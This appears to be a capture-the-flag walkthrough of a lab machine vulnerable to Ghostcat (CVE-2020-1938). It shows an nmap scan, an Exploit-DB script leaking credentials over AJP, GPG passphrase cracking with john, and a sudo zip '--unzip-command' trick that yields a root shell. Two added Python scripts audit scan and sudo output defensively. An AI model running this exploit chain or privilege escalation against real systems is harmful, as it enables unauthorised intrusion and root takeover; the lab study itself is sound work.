Hacking study notes...

Admins Note: This room contains inappropriate content in the form of a username that contains a swear word and should be noted for an educational setting. - Dark

1. Port and service scan

┌──(root㉿kali)-[~]
└─# nmap -sV -vv 10.10.164.145
Starting Nmap 7.93 ( https://nmap.org ) at 2023-08-05 12:21 CST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 12:21
Scanning 10.10.164.145 [4 ports]
Completed Ping Scan at 12:21, 0.29s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:21
Completed Parallel DNS resolution of 1 host. at 12:21, 0.03s elapsed
Initiating SYN Stealth Scan at 12:21
Scanning 10.10.164.145 [1000 ports]
Discovered open port 22/tcp on 10.10.164.145
Discovered open port 8080/tcp on 10.10.164.145
Discovered open port 53/tcp on 10.10.164.145
Discovered open port 8009/tcp on 10.10.164.145
Completed SYN Stealth Scan at 12:21, 4.25s elapsed (1000 total ports)
Initiating Service scan at 12:21
Scanning 4 services on 10.10.164.145
Completed Service scan at 12:21, 9.25s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.164.145.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 12:21
Completed NSE at 12:21, 1.28s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 12:21
Completed NSE at 12:21, 1.04s elapsed
Nmap scan report for 10.10.164.145
Host is up, received echo-reply ttl 63 (0.26s latency).
Scanned at 2023-08-05 12:21:19 CST for 16s
Not shown: 996 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open tcpwrapped syn-ack ttl 63
8009/tcp open ajp13 syn-ack ttl 63 Apache Jserv (Protocol v1.3)
8080/tcp open http syn-ack ttl 63 Apache Tomcat 9.0.30
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.63 seconds
Raw packets sent: 1148 (50.488KB) | Rcvd: 1002 (40.084KB)

The host is running Apache Tomcat (AJP on 8009/tcp, HTTP on 8080/tcp); check whether this version has any known vulnerabilities.
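The triage step above can be automated. The following script is an added example, not part of the original writeup or of nmap: it parses the PORT table from the scan output shown above (embedded here as constructed sample input) and reports two things a defender would want to know from it, whether the AJP connector is reachable from the scanning host and whether the reported Tomcat version predates the Ghostcat (CVE-2020-1938) fix releases (7.0.100, 8.5.51 and 9.0.31). The function and constant names are the example's own; the hardened variant of the scan is constructed to show a clean result.

```python
import re

# Constructed sample input: the PORT table from the nmap -sV output above
NMAP_OUTPUT = """\
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
53/tcp open tcpwrapped syn-ack ttl 63
8009/tcp open ajp13 syn-ack ttl 63 Apache Jserv (Protocol v1.3)
8080/tcp open http syn-ack ttl 63 Apache Tomcat 9.0.30
"""

# Constructed variant of the same host after the AJP connector was disabled
# and Tomcat upgraded (not from the page)
NMAP_OUTPUT_HARDENED = """\
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
8080/tcp open http syn-ack ttl 63 Apache Tomcat 9.0.31
"""

# First release of each Tomcat branch that ships the Ghostcat (CVE-2020-1938) fix
GHOSTCAT_FIXED = {7: (7, 0, 100), 8: (8, 5, 51), 9: (9, 0, 31)}

# port/proto  state  service  reason  [ttl N]  version...
LINE_RE = re.compile(
    r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s+(\S+)(?:\s+ttl\s+\d+)?\s*(.*)$"
)


def parse_nmap(text):
    """Return one dict per port line of a normal-format nmap report."""
    services = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header, blank and summary lines
        port, proto, state, service, reason, version = m.groups()
        services.append({
            "port": int(port), "proto": proto, "state": state,
            "service": service, "reason": reason, "version": version.strip(),
        })
    return services


def tomcat_version(version_field):
    """Extract (major, minor, patch) from an nmap VERSION field, or None."""
    m = re.search(r"Apache Tomcat (\d+)\.(\d+)\.(\d+)", version_field)
    return tuple(int(x) for x in m.groups()) if m else None


def assess(text):
    """Return a list of defender-facing findings for the scanned host."""
    services = parse_nmap(text)
    ajp_open = any(
        s["state"] == "open" and s["proto"] == "tcp"
        and (s["service"] == "ajp13" or s["port"] == 8009)
        for s in services
    )
    tomcat = next(
        (v for v in (tomcat_version(s["version"]) for s in services) if v), None
    )
    findings = []
    if ajp_open:
        findings.append(
            "AJP connector (8009/tcp) reachable from the scanner: bind it to "
            "127.0.0.1, require a connector secret, or disable it in server.xml"
        )
        if tomcat is not None:
            fixed = GHOSTCAT_FIXED.get(tomcat[0])
            if fixed and tomcat < fixed:
                findings.append(
                    "Apache Tomcat %s predates the Ghostcat fix (%s): upgrade"
                    % (".".join(map(str, tomcat)), ".".join(map(str, fixed)))
                )
    return findings


if __name__ == "__main__":
    for finding in assess(NMAP_OUTPUT):
        print("[!]", finding)
    print("hardened host findings:", assess(NMAP_OUTPUT_HARDENED))
```

Run it against a saved `nmap -sV` report to get the same two findings the manual check above produces; on the hardened variant, where the AJP port is closed and Tomcat is at 9.0.31, it returns an empty list. Note that the version check is only as good as nmap's banner reading: a `tcpwrapped` or unversioned line yields `None` and the script then reports only the exposed connector, which is still the finding that matters.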


Let's try it.

2. Exploiting the vulnerability

┌──(root㉿kali)-[/]
└─# python2 /usr/share/exploitdb/exploits/multiple/webapps/48143.py 10.10.164.145
Getting resource at ajp13://10.10.164.145:8009/asdf
----------------------------
<?xml version="1.0" encoding="UTF-8"?>
<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee
http://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"
version="4.0"
metadata-complete="true">

<display-name>Welcome to Tomcat</display-name>
<description>
Welcome to GhostCat
skyfuck:8730281lkjlkjdqlksalks
</description>

</web-app>

Credentials: skyfuck:8730281lkjlkjdqlksalks

Getting user.txt:

skyfuck@ubuntu:/home$ cd merlin
skyfuck@ubuntu:/home/merlin$ ls
user.txt
skyfuck@ubuntu:/home/merlin$ cat user.txt
THM{GhostCat_1s_so_cr4sy}

3. sudo privilege escalation

Cracking the passphrase of the GPG secret key with john, to get at merlin's password:

john --format=gpg --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (gpg, OpenPGP / GnuPG Secret Key [32/64])
Cost 1 (s2k-count) is 65536 for all loaded hashes
Cost 2 (hash algorithm [1:MD5 2:SHA1 3:RIPEMD160 8:SHA256 9:SHA384 10:SHA512 11:SHA224]) is 2 for all loaded hashes
Cost 3 (cipher algorithm [1:IDEA 2:3DES 3:CAST5 4:Blowfish 7:AES128 8:AES192 9:AES256 10:Twofish 11:Camellia128 12:Camellia192 13:Camellia256]) is 9 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
alexandru (tryhackme)
1g 0:00:00:00 DONE (2023-08-05 13:11) 12.50g/s 13400p/s 13400c/s 13400C/s theresa..alexandru
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Decrypting credential.pgp to recover merlin's password:

skyfuck@ubuntu:~$ gpg --import tryhackme.asc
gpg: key C6707170: already in secret keyring
gpg: key C6707170: "tryhackme <stuxnet@tryhackme.com>" not changed
gpg: Total number processed: 2
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys unchanged: 1
skyfuck@ubuntu:~$ ls
credential.pgp tryhackme.asc
skyfuck@ubuntu:~$ gpg --decrypt credential.pgp

You need a passphrase to unlock the secret key for
user: "tryhackme <stuxnet@tryhackme.com>"
1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11 (main key ID C6707170)

gpg: gpg-agent is not available in this session
gpg: WARNING: cipher algorithm CAST5 not found in recipient preferences
gpg: encrypted with 1024-bit ELG-E key, ID 6184FBCC, created 2020-03-11
"tryhackme <stuxnet@tryhackme.com>"
merlin:asuyusdoiuqoilkda312j31k2j123j1g23g12k3g12kj3gk12jg3k12j3kj123j

Switching to the merlin user:

skyfuck@ubuntu:~$ su merlin
Password:
merlin@ubuntu:~$ sudo -l
Matching Defaults entries for merlin on ubuntu:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User merlin may run the following commands on ubuntu:
(root : root) NOPASSWD: /usr/bin/zip
merlin@ubuntu:~$ touch 1.txt
merlin@ubuntu:~$ sudo zip 1.zip 1.txt -T --unzip-command="sh -c ifconfig"
adding: 1.txt (stored 0%)
eth0 Link encap:Ethernet HWaddr 02:ae:63:5b:54:07
inet addr:10.10.164.145 Bcast:10.10.255.255 Mask:255.255.0.0
inet6 addr: fe80::ae:63ff:fe5b:5407/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:9001 Metric:1
RX packets:3347 errors:0 dropped:0 overruns:0 frame:0
TX packets:4283 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:233364 (233.3 KB) TX bytes:455002 (455.0 KB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

test of 1.zip OK
merlin@ubuntu:~$ sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/sh"
updating: 1.txt (stored 0%)
# ls
1.txt 1.zip user.txt ziazgf1h
# cd ../..
# cd rppt
/bin/sh: 3: cd: can't cd to rppt
# cd root
# cat toot.txt
cat: toot.txt: No such file or directory
# ls
root.txt ufw
# cat root.txt
THM{Z1P_1S_FAKE}
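The root cause here is a sudoers rule that lets an unprivileged user run an archiver as root with any arguments and no password. The script below is an added example, not part of the original writeup or of sudo: it parses `sudo -l` output in the format shown above (embedded as constructed sample input, with one extra argument-restricted rule invented for contrast) and flags root-level rules that either carry no argument restriction or name a command this page already documents as able to launch other programs (`zip` via `--unzip-command`). Function names, the `SHELL_ESCAPE` set and the severity labels are the example's own choices.

```python
import re

# Constructed sample: the sudo -l output shown above, plus one benign
# argument-restricted rule (the systemctl line is invented for contrast)
SUDO_L_OUTPUT = """\
Matching Defaults entries for merlin on ubuntu:
    env_reset, mail_badpass

User merlin may run the following commands on ubuntu:
    (root : root) NOPASSWD: /usr/bin/zip
    (root) /bin/systemctl restart nginx
"""

# "(runas_user : runas_group) TAG: /path args, /path2 args"
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(\S.*?)\s*$")

# Commands this page documents as able to run other programs when granted via
# sudo (zip through --unzip-command); extend from your own sudoers review.
SHELL_ESCAPE = {"/usr/bin/zip"}


def parse_sudo_l(text):
    """Return one dict per command granted in 'sudo -l' output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_rules = True  # everything after this header is a rule line
            continue
        m = RULE_RE.match(line) if in_rules else None
        if not m:
            continue
        runas, tags, spec = m.groups()
        runas_user = runas.split(":")[0].strip()
        tagset = set(tags.replace(":", " ").split())
        for cmd in spec.split(", "):  # one rule line may list several commands
            parts = cmd.split()
            rules.append({
                "runas": runas_user,
                "nopasswd": "NOPASSWD" in tagset,
                "command": parts[0],
                "args": parts[1:],
            })
    return rules


def audit(rules):
    """Flag root-level rules whose command can be bent into arbitrary execution."""
    findings = []
    for r in rules:
        if r["runas"] not in ("root", "ALL"):
            continue
        reasons = []
        if not r["args"]:
            reasons.append("no argument restriction in sudoers")
        if r["command"] in SHELL_ESCAPE:
            reasons.append("command can launch other programs")
        if not reasons:
            continue
        if r["nopasswd"]:
            reasons.append("NOPASSWD: no password check before the root command")
        severity = "high" if r["nopasswd"] else "medium"
        findings.append((r["command"], severity, reasons))
    return findings


if __name__ == "__main__":
    for command, severity, reasons in audit(parse_sudo_l(SUDO_L_OUTPUT)):
        print("[%s] %s: %s" % (severity.upper(), command, "; ".join(reasons)))
```

On the sample above only `/usr/bin/zip` is reported, at high severity; the `systemctl restart nginx` rule passes because its arguments are pinned in sudoers, so the user cannot append options of their own. The fix on the target is to drop the rule (or at least remove `NOPASSWD` and pin the arguments), since no argument restriction can make a root-run archiver safe once it accepts a user-supplied helper command.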

Related reading: "Linux zip privilege escalation (sudo zip)", LuckyCharm~'s blog on CSDN